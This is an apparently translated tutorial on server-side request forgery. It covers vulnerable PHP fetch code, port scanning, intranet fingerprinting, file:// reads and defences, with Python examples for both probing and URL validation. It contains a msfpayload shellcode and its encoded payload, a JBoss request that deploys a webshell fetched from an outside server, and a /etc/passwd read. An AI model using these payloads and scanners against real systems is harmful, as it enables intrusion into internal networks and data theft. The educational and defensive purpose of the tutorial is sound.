SSRF Attack overview
Many web applications fetch data from other servers: given a user-specified URL, the application retrieves an image, downloads a file, reads a file's contents, and so on. If this feature is abused, a defective web application can be used as a proxy to attack remote and internal servers. This form of attack is called server-side request forgery (SSRF).
For example, a typical application that provides this functionality is shown in the figure:
If the application does not properly validate and filter both the user-supplied URL and the data returned by the remote server, it may have an SSRF flaw. Google, Facebook, Adobe, Baidu, Tencent and other well-known companies have had this vulnerability reported. An attacker can use SSRF for five main kinds of attack:
1. Port scanning of the external network, the server's intranet and the local machine, and collecting banner information from some of the services found;
2. Attacking applications running on the intranet or the local machine (for example, buffer overflows);
3. Fingerprinting intranet web applications by requesting their default files;
4. Attacking intranet web applications, mainly those exploitable through GET parameters (such as Struts2 command execution, SQL injection, etc.);
5. Reading local files via the file:// protocol.
Common back-end implementations
SSRF can exist in an application written in any language; here we use some PHP code as samples for analysis. Most of the code comes from real application source.
1. PHP file_get_contents():
```php
<?php
$img = '';
if (isset($_POST['url']))
{
    // The URL is used as supplied: scheme, host and port are attacker-controlled
    $content = file_get_contents($_POST['url']);
    $filename = './images/' . rand() . ';img1.jpg';
    file_put_contents($filename, $content);
    echo $_POST['url'];
    $img = "<img src=\"" . $filename . "\"/>";
}
echo $img;
?>
```
This code uses file_get_contents to fetch an image from the user-specified URL, saves it to disk under a random file name, and displays it to the user.
2. PHP fsockopen():
```php
<?php
function GetFile($host, $port, $link)
{
    $fp = fsockopen($host, intval($port), $errno, $errstr, 30);
    if (!$fp) {
        echo "$errstr (error number $errno)\n";
    } else {
        // $link is written straight into the request line
        $out  = "GET $link HTTP/1.1\r\n";
        $out .= "Host: $host\r\n";
        $out .= "Connection: close\r\n\r\n";
        $out .= "\r\n";
        fwrite($fp, $out);
        $contents = '';
        while (!feof($fp)) {
            $contents .= fgets($fp, 1024);
        }
        fclose($fp);
        return $contents;
    }
}
?>
```
This code uses fsockopen to fetch data (a file or HTML) from the URL the user set. The function opens a raw TCP socket to the server and transmits the request bytes as written, so the host, port and path all come from the user, and a CR/LF in $link would be sent into the request unchanged.
3. PHP curl_exec():
```php
<?php
if (isset($_POST['url']))
{
    $link = $_POST['url'];
    $curlobj = curl_init();
    curl_setopt($curlobj, CURLOPT_POST, 0);
    curl_setopt($curlobj, CURLOPT_URL, $link);   // any scheme curl supports is accepted
    curl_setopt($curlobj, CURLOPT_RETURNTRANSFER, 1);
    $result = curl_exec($curlobj);
    curl_close($curlobj);

    $filename = './curled/' . rand() . '.txt';
    file_put_contents($filename, $result);
    echo $result;
}
?>
```
This is another very common implementation: it uses curl to fetch the data and echoes the result back to the user.
Attack scenario
In most web server architectures, the web server itself can reach both the Internet and the intranet it sits in. The figure shows where requests issued by the web server can reach.
Port scan
Most social networking sites allow uploading an image from a user-specified URL. If the user enters an invalid URL, most web applications return an error message. An attacker can instead enter uncommon but valid URIs such as:
http://example.com:8080/dir/images/
http://example.com:22/dir/public/image.jpg
http://example.com:3306/dir/images/
and then infer from what the server returns whether the port is open. Most applications do not check the port: as long as the URL is well-formed, the request is made. Most TCP services send a banner as soon as the connection is established; the banner is ASCII and may be shown as raw HTML data. Of course, the application usually does not display the raw response directly, but different error codes, the length of the returned data and the response time can all be used to determine the port state of the remote server.
The following implementation can be used as a port scanner:
```php
<?php
if (isset($_POST['url']))
{
    $link = $_POST['url'];
    $filename = './curled/' . rand() . '.txt';
    $curlobj = curl_init($link);
    $fp = fopen($filename, "w");
    curl_setopt($curlobj, CURLOPT_FILE, $fp);
    curl_setopt($curlobj, CURLOPT_HEADER, 0);
    curl_exec($curlobj);
    curl_close($curlobj);
    fclose($fp);
    $fp = fopen($filename, "r");
    $result = fread($fp, filesize($filename));
    fclose($fp);
    echo $result;
}
?>
```
Readers can test it by submitting the following form (rather crude):
```html
<html>
<body>
<form name="px" method="post" action="http://127.0.0.1/ss.php">
<input type="text" name="url" value="">
<input type="submit" name="commit" value="Submit">
</form>
</body>
</html>
```
Under normal circumstances, requesting http://www.twitter.com/robots.txt returns the following:
If a port running a non-HTTP service is requested, for example http://scanme.nmap.org:22/test.txt, the service banner is returned:
Requesting a closed port returns an error: http://scanme.nmap.org:25/test.txt
Requesting the local MySQL port: http://127.0.0.1:3306/test.txt
Of course, most Internet applications do not return the banner directly, but as mentioned above the port state can still be inferred from the error message, the response time and the response size. Below is a case from Google's Webmaster tool in which the returned information reveals the port state; Google has fixed the flaw.
Attacking the application
Intranet security is usually weak; overflow vulnerabilities, weak passwords and the like are common. Through SSRF an attacker gains reachability into the intranet and can then attack intranet or local machines, obtain shells, and so on.
Here is a small program for a local demonstration:
Request: http://127.0.0.1:8987/test.txt
Port 8987 is detected as open.
Request:
Aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
This is a white-box analysis; in a real engagement that is not available and one can only exploit known vulnerabilities. The exploit is written from the analysis. Because HTTP is a text-based protocol, non-printable bytes in the payload are a problem, so msfencode is used to produce an alphanumeric encoding. The command is as follows:
msfpayload windows/exec CMD=calc.exe R | msfencode BufferRegister=ESP -e x86/alpha_mixed
The final payload is as follows:
aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa@ ' ßwtyiiiiiiiiiiiiiiii7qzjaxp0a0akaaq2ab2bb0bbabxp8abujiilhhmyupwpwp3pk9he01xrstnkprfplkprtllkpr24nkbr7xdomgszuvvq9oeakpllg L3qql5rflwpiqjodm31jgkrhpabpwnk3bvplksrwlwqzplk1p0xmu9psdcz7qzpf0nkqx6xnk2xups1n3xcgl3ynkednkvayf4qko5akpnliqjo4m31o76xip buztdc3mhxgkamvdbu8bchlkshetgqhsqvlktlrknkshulgqzslk5tlkvazpoy3tgtwtqkqksq0ysjrqyokp2xcosjnkwb8klfqm0jfanmlelyc05pc0ppsx6 Qlk0oowkoyeokhph5920vbhy6meomomkon5uls6sluzmpykip2ufeok3wfs422objs0sc9ozucspapl3sc0aa
The overflow succeeds and the calculator pops up.
You may wonder whether data sent over HTTP can be accepted by servers speaking other protocols; see the article on cross-protocol communication techniques.
Fingerprint Identification of Intranet Web application
Identifying the frameworks, platforms, modules and CMS used by intranet applications helps greatly with subsequent attacks. Most web application frameworks ship some unique files and directories; these can be used to identify the type of application and sometimes its exact version, after which a targeted set of vulnerabilities can be tried. For example, the first request below determines whether phpMyAdmin is installed, and the other two identify other common applications in the same way:
request: http://127.0.0.1:8080/phpmyadmin/themes/original/img/b_tblimport.png
request: http://127.0.0.1:8081/wp-content/themes/default/images/audio.jpg
request: http://127.0.0.1:8082/profiles/minimal/translations/README.txt
Accessing http://10.0.0.1/portName.js tells whether the device is a D-Link router.
The following Baidu case from WooYun has been fixed: the server was identified as Tomcat by accessing http://10.50.33.43:8080/manager/images/tomcat.gif.
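The two probing techniques described above (port-state inference in the "Port scan" section and default-file fingerprinting in this section) as one added example in Python; this is not code from the original article, whose samples are PHP. It drives the article's vulnerable "fetch this URL" page with the same url= POST parameter the HTML form uses, infers port state from differences against a port assumed closed rather than from banners, and checks fingerprint probes against file magic so an application that answers every path with its own error page does not produce false hits. The endpoint and target addresses, the SAMPLE_* response tables, and the application name marked "assumed" in SIGNATURES are constructed for illustration.

```python
"""Added example: probing through an SSRF endpoint.

Constructed/assumed: app and target addresses, SAMPLE_PORTS, SAMPLE_PATHS,
and the 'Drupal (assumed)' signature entry.
"""
import time
import urllib.error
import urllib.parse
import urllib.request


def post_url_via_app(app_url, url, timeout=10.0):
    """Submit url= to the vulnerable page (like the article's HTML form) and
    return (status, body).  Transport errors become status 0 with an empty
    body so they can still be compared with other responses."""
    data = urllib.parse.urlencode({"url": url}).encode()
    try:
        with urllib.request.urlopen(app_url, data=data, timeout=timeout) as r:
            return r.status, r.read()
    except urllib.error.HTTPError as e:      # 4xx/5xx pages still carry a body
        return e.code, e.read()
    except OSError:                          # URLError, timeouts, resets
        return 0, b""


def timed(fetch):
    """Turn fetch(url) -> (status, body) into fetch(url) -> (status, len, secs)."""
    def inner(url):
        t0 = time.monotonic()
        status, body = fetch(url)
        return status, len(body), time.monotonic() - t0
    return inner


def scan_ports(fetch, target, ports, closed_ref=1, slow=5.0):
    """fetch(url) -> (status, length, seconds).  The response for closed_ref,
    a port assumed closed on the target, is the baseline: identical signature
    => closed; a slow answer (the app hung on connect) => filtered; any other
    difference (banner echoed, other error text, other size) => open."""
    base = fetch("http://%s:%d/" % (target, closed_ref))[:2]
    state = {}
    for port in ports:
        status, length, secs = fetch("http://%s:%d/" % (target, port))
        if secs >= slow:
            state[port] = "filtered"
        elif (status, length) == base:
            state[port] = "closed"
        else:
            state[port] = "open"
    return state


# (application, probe path from the article, bytes expected in the body).
# An empty magic accepts any body that differs from the not-found baseline.
SIGNATURES = [
    ("phpMyAdmin", "/phpmyadmin/themes/original/img/b_tblimport.png", b"\x89PNG"),
    ("WordPress", "/wp-content/themes/default/images/audio.jpg", b"\xff\xd8\xff"),
    ("Drupal (assumed; the article does not name it)",
     "/profiles/minimal/translations/README.txt", b""),
    ("Apache Tomcat manager", "/manager/images/tomcat.gif", b"GIF8"),
    ("D-Link router", "/portName.js", b""),
]


def fingerprint(fetch, base_url, probe="/zz-not-there-zz"):
    """fetch(url) -> (status, body).  A probe counts only if its body differs
    from the not-found baseline and contains the expected file magic."""
    _, baseline = fetch(base_url + probe)
    hits = []
    for name, path, magic in SIGNATURES:
        _, body = fetch(base_url + path)
        if body and body != baseline and magic in body:
            hits.append(name)
    return hits


# Constructed responses standing in for a live endpoint so the example runs offline.
SAMPLE_PORTS = {                                 # url -> (status, length, seconds)
    "http://10.0.0.5:1/": (200, 22, 0.05),       # "Error: could not fetch"
    "http://10.0.0.5:22/": (200, 41, 0.06),      # SSH banner echoed back
    "http://10.0.0.5:25/": (200, 22, 0.05),      # same error as the closed reference
    "http://10.0.0.5:3306/": (200, 60, 0.05),    # MySQL greeting echoed back
    "http://10.0.0.5:445/": (0, 0, 10.0),        # connect hung until timeout
}
NOT_FOUND = b"<html>404 Not Found</html>"
SAMPLE_PATHS = {                                 # url -> (status, body)
    "http://10.0.0.5:8080/manager/images/tomcat.gif": (200, b"GIF89a\x00\x00"),
    "http://10.0.0.5:8080/wp-content/themes/default/images/audio.jpg":
        (200, b"<html>403 Forbidden</html>"),    # differs from baseline, no JPEG magic
}


def sample_port_fetch(url):
    return SAMPLE_PORTS[url]


def sample_path_fetch(url):
    return SAMPLE_PATHS.get(url, (200, NOT_FOUND))


if __name__ == "__main__":
    print(scan_ports(sample_port_fetch, "10.0.0.5", [22, 25, 3306, 445]))
    print(fingerprint(sample_path_fetch, "http://10.0.0.5:8080"))
    # Against a live target (assumed endpoint from the article's form):
    # live = lambda u: post_url_via_app("http://127.0.0.1/ss.php", u)
    # scan_ports(timed(live), "10.0.0.5", range(1, 1025))
    # fingerprint(live, "http://10.0.0.5:8080")
```

The baseline-comparison approach is what makes this work when the application applies a uniform error message: an open port still tends to change the response size or timing even when no banner is echoed, which is exactly why the defence section below recommends uniform errors together with port restrictions rather than on their own.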
Attacking intranet Web applications
Many web attacks can be carried out with a GET request alone, such as Struts2 command execution. Here is a JBoss case in which a webshell can be deployed with a single GET request.
Simply host the webshell (packaged as a WAR) on a public server and then send this request:
&name=jboss.system:service=MainDeployer&methodIndex&arg0=http://our_public_internet_server/utils/cmd.war
Then invoke the webshell with extra parameters to execute a command: http://127.0.0.1:8080/cmd/shell.jsp?x=dir
In practice there is usually no echo, so this has to be done blind.
Read local file
The cases above are all based on HTTP requests. If the file protocol is specified instead, files on the server itself can be read. The following request makes the application read a local file:
Request: file:///c:/windows/win.ini
The following is an Adobe case that has since been fixed. Request: file:///etc/passwd
How to Defend
Five defensive approaches are commonly used:
1. Filter the returned data. Verifying the remote server's response before showing it is the easiest measure: if the application expects a file of one type (for example an image), check that the returned data actually is one before presenting it to the user.
2. Use a uniform error message, so that users cannot infer the port state of the remote server from differing errors.
3. Restrict the requested port to common HTTP ports, for example 80, 443, 8080, 8090.
4. Blacklist intranet IP addresses, so that the application cannot be used to read intranet data or attack the intranet. The check must be applied to the address actually connected to, after DNS resolution and after every redirect: checking only the hostname string is bypassed by DNS names that resolve to internal addresses, by 3xx redirects, and by alternative encodings of an IP address. An allowlist of permitted destinations is stronger wherever the use case permits one.
5. Disable unneeded protocols and allow only HTTP and HTTPS. This prevents problems with file:///, gopher://, ftp:// and similar. With curl, restrict CURLOPT_PROTOCOLS (and CURLOPT_REDIR_PROTOCOLS) and leave CURLOPT_FOLLOWLOCATION off unless each redirect target is re-validated.
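The five measures above as one allowlist check, written in Python as an added example (not code from the article, whose samples are PHP). It accepts only http/https, only the listed ports, rejects userinfo in the URL, resolves the hostname and requires every returned address to be public (loopback, RFC 1918, link-local including the 169.254.169.254 metadata address, CGNAT, multicast, unspecified, and IPv4-mapped IPv6 forms of the same are all refused), and returns the resolved address so the caller can pin the connection to it. Assumed or constructed: the hostnames in FAKE_DNS, the UnsafeURL exception name, and that the caller connects to the returned address rather than re-resolving the name.

```python
"""Added example: allowlist validation of a user-supplied fetch URL.

Constructed/assumed: FAKE_DNS entries, the UnsafeURL exception, and a caller
that connects to the returned ip instead of re-resolving the hostname.
"""
import ipaddress
import socket
from urllib.parse import urlsplit

ALLOWED_SCHEMES = {"http", "https"}          # defence 5: no file://, gopher://, ftp://
ALLOWED_PORTS = {80, 443, 8080, 8090}        # defence 3: common HTTP ports only
CGNAT = ipaddress.ip_network("100.64.0.0/10")


class UnsafeURL(ValueError):
    """Defence 2: one uniform rejection that carries no detail about why."""


def is_internal(ip):
    """Defence 4, applied to addresses rather than hostname strings.  IPv4-mapped
    IPv6 is unwrapped first so ::ffff:127.0.0.1 is judged as 127.0.0.1."""
    if ip.version == 6 and ip.ipv4_mapped is not None:
        ip = ip.ipv4_mapped
    return (ip.is_private or ip.is_loopback or ip.is_link_local
            or ip.is_multicast or ip.is_reserved or ip.is_unspecified
            or (ip.version == 4 and ip in CGNAT))


def resolve_host(host):
    """All A/AAAA answers for host.  Every answer must pass, because a name can
    mix a public and a private address to slip past a first-answer check."""
    try:
        infos = socket.getaddrinfo(host, None, proto=socket.IPPROTO_TCP)
    except socket.gaierror:
        return []
    addrs = {ipaddress.ip_address(ai[4][0]) for ai in infos}
    return sorted(addrs, key=lambda a: (a.version, int(a)))


def validate_fetch_url(url, resolve=resolve_host):
    """Return (scheme, host, port, ip) for an acceptable URL or raise UnsafeURL.
    ip is the address to connect to; pinning it closes the window in which the
    name could be re-resolved (DNS rebinding) to an internal address."""
    try:
        parts = urlsplit(url.strip())
        port = parts.port                     # ValueError on "http://h:abc/"
    except ValueError:
        raise UnsafeURL()
    scheme = parts.scheme.lower()
    host = parts.hostname
    if scheme not in ALLOWED_SCHEMES or not host or parts.username is not None:
        raise UnsafeURL()                     # no userinfo tricks: http://safe@10.0.0.1/
    port = port or (443 if scheme == "https" else 80)
    if port not in ALLOWED_PORTS:
        raise UnsafeURL()
    try:
        addrs = [ipaddress.ip_address(host)]  # IP literal: nothing to resolve
    except ValueError:
        addrs = resolve(host)                 # names, and decimal/hex IP forms, go here
    if not addrs or any(is_internal(a) for a in addrs):
        raise UnsafeURL()
    return scheme, host, port, addrs[0]


def is_safe_fetch_url(url, resolve=resolve_host):
    try:
        validate_fetch_url(url, resolve)
        return True
    except UnsafeURL:
        return False


# Constructed DNS answers (hypothetical names) so the example runs offline.
FAKE_DNS = {
    "img.example.org": [ipaddress.ip_address("93.184.216.34")],
    "rebind.example": [ipaddress.ip_address("93.184.216.34"),
                       ipaddress.ip_address("10.0.0.5")],
    "meta.example": [ipaddress.ip_address("169.254.169.254")],
}


def fake_resolve(host):
    return FAKE_DNS.get(host, [])


if __name__ == "__main__":
    for u in ("http://img.example.org/a.png", "http://127.0.0.1:3306/test.txt",
              "file:///etc/passwd", "http://rebind.example/",
              "http://[::ffff:127.0.0.1]:8080/", "http://meta.example/latest/meta-data/"):
        print(u, "->", "allowed" if is_safe_fetch_url(u, fake_resolve) else "rejected")
```

In the PHP samples above the equivalent is to run this check before curl_exec, pin the connection with CURLOPT_RESOLVE to the address the check returned, restrict CURLOPT_PROTOCOLS to CURLPROTO_HTTP | CURLPROTO_HTTPS, and keep CURLOPT_FOLLOWLOCATION off so that each Location header is validated again before being followed. Defence 1 (checking that the returned bytes are the expected file type) is a separate step applied to the response.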
Resources
Http://www.riyazwalikar.com/2012/11/cross-site-port-attacks-xspa-part-3.html
http://evilcos.me/?p=2
http://www.wooyun.org
Via riyazwalikar.com; compiled by [email protected]